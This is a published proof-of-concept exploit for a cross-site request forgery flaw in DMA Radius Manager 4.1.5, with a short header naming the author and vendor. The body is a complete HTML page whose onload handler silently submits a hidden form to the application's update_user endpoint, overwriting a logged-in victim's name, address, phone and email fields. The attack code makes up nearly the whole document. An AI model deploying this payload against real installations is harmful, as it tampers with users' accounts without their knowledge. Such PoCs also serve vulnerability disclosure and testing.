<!-- # Exploit Title: DMA Radius Manager <= 4.1.5 CSRF (Edit Account) # Exploit Author: bl4ck_mohajem # Vendor Homepage: http://yonacms.com # Version: 4.1.5 # Overview DMA Radius Manager is a easy to use administration system for Mikrotik, Cisco, StarOS, Chillispot, DD-WRT, pfSense NAS devices and DOCSIS CMTS. It provides centralized authentication, accounting and billing functions. CSRF PoC Code ============= --> <html> <body onload="document.csrf.submit()"> <form name="csrf" action="http://127.0.0.1/user.php?cont=update_user" method="post"> <input name="firstname" type="hidden" value="Name"> <input name="lastname" type="hidden" value="Family"> <input name="address" type="hidden" value="IRan"> <input name="city" type="hidden" value="IRAN"> <input name="zip" type="hidden" value="010101"> <input name="country" type="hidden" value="Albania"> <input name="state" type="hidden" value="Alabama"> <input name="phone" type="hidden" value="00000000"> <input name="mobile" type="hidden" value="000000000"> <input name="email" type="hidden" value=""> <input name="company" type="hidden" value=""> <input name="taxid" type="hidden" value=""> <input name="lang" type="hidden" value="English"> <input name="alertsms" type="hidden" value="1"> </form> </body> </html> <!-- --> ###################################################### # #tanks: Dr Ms Jk - n1arash - Milad Hacking - malah_sky ############################################################